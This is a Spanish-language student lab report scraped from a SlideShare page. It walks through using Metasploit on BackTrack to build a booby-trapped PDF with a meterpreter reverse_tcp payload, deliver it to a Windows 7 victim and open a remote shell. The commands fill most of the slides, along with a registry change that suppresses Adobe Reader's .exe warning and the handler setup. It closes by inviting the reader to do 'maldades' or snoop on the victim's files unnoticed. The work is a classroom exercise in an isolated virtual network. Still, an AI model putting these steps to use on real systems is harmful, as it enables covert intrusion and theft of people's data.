HACKING BACKTRACK 1

OBJETIVO DE LA PRÁCTICA

Desearemos desde un PC atacante hacer una conexión remota a un PC víctima.
E...
ESQUEMA DE LA PRÁCTICA

Equipo atacante = 192.168.1.2
Equipo víctima = 192.168.1.3
Como podemos ver en el dibujo, ambos PC...
CREACIÓN DEL PDF…

A la hora de crear el PDF, tenemos que tener en cuenta los siguientes comandos (que
utilizaremos):


u...
TRANSMISIÓN DEL ARCHIVO

Ahora, de cualquier forma tenemos que conseguir que la víctima reciba dicho archivo PDF
creado.
E...
DETALLES DE ADOBE READER

La realización de la práctica ha sido ardua básicamente por los permisos y versiones de Adobe
Re...
EMPIEZA EL ATAQUE

Una vez solucionados todos los problemas con la víctima, realizaremos el ataque desde
nuestro atacante,...
MODO ESCUCHA

La víctima abrirá el archivo PDF y comprobará que le sale una terminal extraña, que
desaparecerá al momento....
Dentro del parámetro meterpreter, ponemos “Shell” para meternos dentro del PC de la
víctima, sin que éste se dé cuenta de ...
Upcoming SlideShare
Loading in …5
×

Seguridad: Backtrack1_bis

372 views
277 views

Published on

Published in: Education
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
372
On SlideShare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
6
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Seguridad: Backtrack1_bis

  1. 1. HACKING BACKTRACK 1 OBJETIVO DE LA PRÁCTICA Desearemos desde un PC atacante hacer una conexión remota a un PC víctima. Esta conexión será “malintencionada” y se realizará desde el puerto 4444 a través del Sistema Operativo Backtrack creando un archivo .PDF infectado y enviándolo al PC víctima. Una vez el PC victima abra el archivo, se abrirá un backdoor y desde el PC atacante podremos acceder a la Shell de la víctima y podremos visualizar todo su contenido. DETALLES A TENER EN CUENTA La realización de esta práctica ha supuesto unas complicaciones externas debido a algunos detalles que explicaremos a continuación.       Trabajaremos con MSFConsole en el entorno Backtrack. Cuando se crea el PDF, tenemos que agregar la IP del Atacante en el comando lhost. La versión de Adobe Reader que debe tener el cliente será la 9.0. Se han editado los registros de Adobe Reader para permitir el uso del .exe. Se ignorará el hecho de realizar la conexión con el puerto 443. La víctima debe tener desactivado el Firewall.
  2. 2. ESQUEMA DE LA PRÁCTICA Equipo atacante = 192.168.1.2 Equipo víctima = 192.168.1.3 Como podemos ver en el dibujo, ambos PCs deben estar conectados en la misma red para realizarse el ataque. Para ello los hemos puesto a ambos en una VMnet juntos. El Equipo víctima será quien tenga el .PDF infectado y quien será atacado por el equipo 1.2. PROCEDIMIENTO DE LA PRÁCTICA Para empezar la práctica, primero de todos tendremos que contar con un sistema operativo llamado Backtrack, basado en distribuciones Linux. Este O.S. es una herramienta bastante particular basada en este tipo de ejemplos y prácticas en cuanto a “jugar” con la red. El primer paso será crear un archivo .PDF. Éste será la base de nuestro ataque. Gracias a él podremos infectar a la víctima una vez abra el archivo que le enviaremos. Abriremos la terminal del Backtrack y utilizaremos la MSFConsole. Esta consola se centra y permite un acceso eficiente a las opciones relacionadas con los Exploits que se utilizarán. Gracias a ésta, se facilita el uso de las herramientas.
  3. 3. CREACIÓN DEL PDF… A la hora de crear el PDF, tenemos que tener en cuenta los siguientes comandos (que utilizaremos):  use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs. Sirve para decirle que vamos a utilizer un exploit con Adobe PDF embedded y un .exe como extensión.  set payload windows/meterpreter/reverse_tcp Es el Payload, que nos devolverá un Meterpreter. El Payload traducido es la carga útil, es la información del envío de datos que usaremos para el ataque.  set lhost 192.168.1.2. Añadiremos la IP del Atacante.  set filename vellimalote.pdf Crearemos un PDF con el nombre indicado.  Exploit Cargaremos el exploit para que se cree.
  4. 4. TRANSMISIÓN DEL ARCHIVO Ahora, de cualquier forma tenemos que conseguir que la víctima reciba dicho archivo PDF creado. En este paso nosotros directamente lo hemos enviado o traspasado por un USB para facilitar el uso de éste. Localizaremos el archivo, en la ruta donde se ha guardado: /msf4/local/vellimalote.pdf *Hay dos archivos, vellimalo y vellimalote porque se hicieron varias pruebas. Pero el que nos servirá y estamos utilizando es Vellimalote.pdf Enviaremos el archivo a la máquina Windows 7, que será la víctima: Hay que tener en cuenta, que la víctima debe tener un Adobe Reader inferior a la versión 9.3. En nuestro caso utilizaremos la 9.0, que no dará muchos problemas a la hora de realizar la apertura del archivo.
  5. 5. DETALLES DE ADOBE READER La realización de la práctica ha sido ardua básicamente por los permisos y versiones de Adobe Reader. Para que funcionara 100% hemos hecho unos cambios, encontrados en Internet.  Actualizar el registro de Adobe Reader. Después de una búsqueda exhaustiva por Internet, muchos usuarios coincidían en que el registro de Adobe Reader debía ser cambiado. Para ello utilizaremos la herramienta de Windows, “regedit” y seguiremos la siguiente ruta: HKEY_LOCAL_Machine / Software / Policies / Adobe / Acrobat Reader / 9.0 / FeatureLockDown / cDefaultLaunchAttachmentPerms Una vez dentro, veremos esto: Editaremos el registro “BuiltInPermList” y le quitaremos la extensión .exe. De esta forma, cuando abramos el archivo PDF no nos surgirá ningún mensaje molesto relacionado con la infección o el mal uso del archivo.
  6. 6. EMPIEZA EL ATAQUE Una vez solucionados todos los problemas con la víctima, realizaremos el ataque desde nuestro atacante, valga la redundancia. Utilizaremos los siguientes comandos:  Use exploit/multi/handler Utilizaremos el controlador del Exploit.  Set payload Windows/meterpreter/reverse_tcp Utilización del TCP (lo mismo que cuando creamos el PDF).  Set lhost 192.168.1.2 Agregamos la IP del atacante.  Exploit Arrancamos el exploit. El ataque será enviado mediante escucha. Es decir, que cuando la víctima abra el archivo infectado (enviado anteriormente, el PDF) será cuando el atacante podrá entrar en la Shell del usuario y entonces el ataque habrá sido realizado correctamente.
  7. 7. MODO ESCUCHA La víctima abrirá el archivo PDF y comprobará que le sale una terminal extraña, que desaparecerá al momento. Cuando el usuario víctima ve esto, en la mayoría de los casos se despreocupa y sigue realizando las tareas que estaba haciendo, pero realmente este ha sido el momento de infección, ya que el atacante ha podido realizar la conexión. El atacante estará esperando (modo escucha) y verá cómo se crea la conexión:
  8. 8. Dentro del parámetro meterpreter, ponemos “Shell” para meternos dentro del PC de la víctima, sin que éste se dé cuenta de nada. Y como podemos ver, ya estamos dentro del Desktop de la víctima: A partir de ahora podemos navegar por el PC de la víctima y realizar maldades o simplemente ser un cotilla y ver toda la información que tiene el usuario. José Mª Vellido – ASIX2M Hacking Backtrack 1 – SEGDISP Fran Pérez – 2013/2014

×